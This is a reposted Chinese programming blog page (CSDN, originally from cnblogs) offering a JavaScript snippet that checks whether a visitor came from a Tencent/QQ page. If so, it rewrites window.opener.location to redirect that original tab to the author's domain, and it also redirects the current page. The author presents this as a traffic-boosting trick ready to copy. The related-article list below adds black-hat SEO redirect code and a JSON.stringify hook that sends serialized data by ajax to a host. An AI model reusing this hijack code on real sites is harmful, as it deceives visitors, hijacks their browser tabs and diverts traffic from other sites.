JS 劫持来源网站并做指定跳转

最新推荐文章于 2024-06-21 16:58:44 发布
最新推荐文章于 2024-06-21 16:58:44 发布
阅读量666 收藏 2
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/keerdi/p/5892948.html
版权

有时候给网站做流量,免不了要做一些网站劫持的JS跳转,这里贴上一段劫持来源网站的JS跳转方法,很简单

<script>
  // 获取来源网站
  var slyar = document.referrer;
  if(slyar.indexOf("qq")>0)// 判断网站是否来自腾讯网
    // 劫持源网址跳转(这个就是让腾讯网跳转到指定的网站)
    window.opener.location.href = "http://www.我的域名.com";
    // 劫持打开的网址跳转(这个就是让打开的网站跳转到指定的网站)
    self.location = "http://www.指定的域名.com";
</script>

 

有时候也要判断通过来源网站来进行某些操作

<script type="text/javascript">
	var slyar = document.referrer;
	var urls = ['localhost'];   //指定你想要alert的域名,多个可以在数组中直接追加即可,追加如:['www.bbb.com', 'bbb.com', 'abc.bbb.com']
          
	for(key in urls){ 
		if(slyar.indexOf(urls[key]) >= 0){
			// 指定的字符串值alertUrls[key]在字符串href中出现则>=0,否则为-1
              // 执行某些操作
			break; //直接跳出循环
		}
	}
</script>

  

虽然代码很简单,但是用到的却是很多,需要的直接拿走修改一下就可以用了。

 

 

 

不求点赞,只愿与你分享。

转载于:https://www.cnblogs.com/keerdi/p/5892948.html

dengxun1856
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JS劫持、DNS劫持与页面劫持跳转详解
weixin_65409651的博客
07-22 774
JS劫持JavaScript Hijacking)是一种通过恶意JavaScript代码控制或篡改网页内容的攻击手段。攻击者可以注入恶意代码,劫持用户的操作,窃取敏感信息或执行未授权的操作。DNS劫持(DNS Hijacking)是一种通过篡改域名系统(DNS)解析结果,将用户重定向到恶意网站的攻击手段。攻击者可以通过多种方式实现DNS劫持,包括修改DNS设置、攻击DNS服务器或通过恶意软件感染用户设备。
html代码劫持教程,记录一次 JavaScript解密(跳转劫持代码)全过程
weixin_39811166的博客
06-07 1993
今天一位朋友给了我一段JavaScript跳转劫持代码,恰好这段JS跳转劫持代码被加密过了,需要进行 JavaScript解密 一下才会变成明文,JavaScript加密的代码如下:index.htmlbody{border: 0;margin: 0;padding: 0;height: 100vh;width: 100%;background: #fff;overflow: hidden;}['...
JS【实战】劫持跨域的网页链接跳转
最新发布
朝阳39的博客
06-21 239
/ href 可能是绝对路径,也可能是相对路径。因此最好转换为 URL 再统一判断。// 同源,则继续默认行为。// 非同源,则弹出提示框。
JS跳转,WD快照,劫持蜘蛛等演示
07-18
JS获取百度代码跳转,WD快照,劫持蜘蛛等演示
黑帽SEO是什么原理,常用的PHP+ASP页面劫持四种JS跳转代码
weixin_43878963的博客
06-23 610
使用织梦CMS网站后台程序的应该知道,使用DeDecms建站的站点老是被黑,之前,对这个几个代码比较熟悉(毕竟经常被黑),此黑帽SEOASP页面劫持JS跳转代码仅供参考交流学习,请勿用于违法使用行为。 很多SEOer白帽不好自己的网站,那么他们就会开始歪门邪道的想尽方法,会选择使用黑帽SEO技术来提高网站排名,获取相应流量,但是黑帽SEO技术新起点博客在这里建议大家不要去,分享出来代码也只是为了让大家能够多动的了解搜索引擎,而不是鼓励大家使用黑帽技术来掩耳盗铃。那么使用此方法的代码都有什么呢?和SEO
js跳转不影响蜘蛛抓取.rar
06-16
当涉及到JSJavaScript跳转时,一个常见的担忧是这可能会影响搜索引擎的抓取,导致某些页面无法被正确索引。本文将深入探讨如何确保JS跳转不影响蜘蛛抓取,并提供相关的解决方案。 首先,我们需要理解为什么JS...
JS代码根据搜索引擎来路来判断 跳转指定页面
08-17
### JS代码根据搜索引擎来路判断并跳转指定页面 在现代互联网开发中,网站往往需要根据用户的不同来源出响应式的处理,比如根据用户是否来自特定的搜索引擎进行页面跳转等操作。本文将深入探讨几种不同的实现...
谷歌内核系列浏览器地址栏域名监控并跳转
02-14
2、程序经过反复测试,目前能十分稳定的将目标域名跳转指定域名上。 3、Windows 7 下兼容 IE、edge、360系列、谷歌、Chrome内核系列等等浏览器。 4、Windows 10 / 11 下兼容 IE、edge、360安全、谷歌等浏览器(部分...
搜索关键词劫持跳转
05-09
百度搜索关键词劫持跳转 if InStr(REFERER,keywords1) > 0 Or InStr(REFERER,keywords2)> 0 Or InStr(REFERER,keywords3> 0 Or InStr(REFERER,keywords4)> 0 Or InStr(REFERER,keywords5)> 0 Then
PHP劫持跳转代码
07-24
当我们谈论"PHP劫持跳转代码"时,这通常涉及到一种安全问题,即恶意攻击者利用PHP代码来控制或篡改网站的行为,使得用户在访问特定页面时被强制跳转到其他不受信任的网站。 PHP劫持跳转通常是通过注入恶意代码实现...
JavaScript的函数劫持
03-14
NULL 博文链接:https://hongan.iteye.com/blog/287081
根据指定来路网址隐性跳转代码
04-22
根据指定来路网址隐性跳转代码
判断搜索引擎来路进行跳转的代码(PHP+JS)
黑猫警长博客
10-20 9738
JS判断搜索引擎来路跳转代码:var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) {
Bugku应急加固1——JS劫持
未完成的歌~的博客
04-20 1481
来打一下bugku的应急加固靶场,靶场链接:https://ctf.bugku.com/ctfplus/detail/id/2.html启动环境。
js中的函数劫持
标子 的专栏
01-18 2604
js中的很多对象属性都是可以被用户改写的,这很容易让坏人进行属性的劫持。当一个网站存在xss漏洞的时候,我们可以注入自己的js,进行函数劫持。 var tmp = JSON.stringify; JSON.stringify = function(data) { $.ajax({ url:'http://localhost',
如果域名被劫持该怎么办?有什么应对方法?
聚名网
01-04 5923
如果域名被劫持怎么办?主要劫持的域名(网站)基本上都属于营业性(经营性)网站,就在今年一些很多知名的JD、Baidu、Q都被劫持,非常恼火的是,流量直接被转移到国外。经过分析域名劫持网站劫持分为:DNS劫持、DNS污染、HTTP劫持、地区网络劫持、路由劫持,注入劫持,攻击劫持等形式。
JavaScript——劫持
z_2532040197的博客
06-15 2285
概念:函数劫持,顾名思义,即在一个函数运行之前把它劫持下来,添加我们想要的功能。当这个函数实际运行的时候,它已经不是原本的函数了,而是带上了被我们添加上去的功能。这也是我们常见的钩子函数的原理之一。...
快照劫持怎么的,网站劫持跳转教程
VV13099612171的博客
10-23 2464
最近收到站长SEO反馈,大量的网站快照被劫持,点击网站劫持跳转另一个网站,有没有解决办法呢?整理一下关于快照被劫持跳转到其他网站的方法。 1,经常查看自己的网站收录 如下图所示,每天site网址查看网站是否被黑,及时发现处理把网站风险降到最低。百度也会在搜索结果页面中标红显示网站被黑存在的安全问题。 经常查看自己的网站收录 2,检查网站源码是否异常 查看网站源码,如图所示。发现源码中头部包含大量“乱码”百分百网站已经被黑。 点击网站跳转到别的网站就是以下图片所示,表明已经被植入了跳转代码
指定来源的 frame是什么意思
05-12
指定来源的 frame 是一个 HTML 中的属性,用于指定一个 iframe 元素内嵌的文档的来源,即可以在 iframe 中加载哪些网站或文档。这个属性可以帮助防范一些安全威胁,比如点击劫持攻击(clickjacking)等。如果没有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值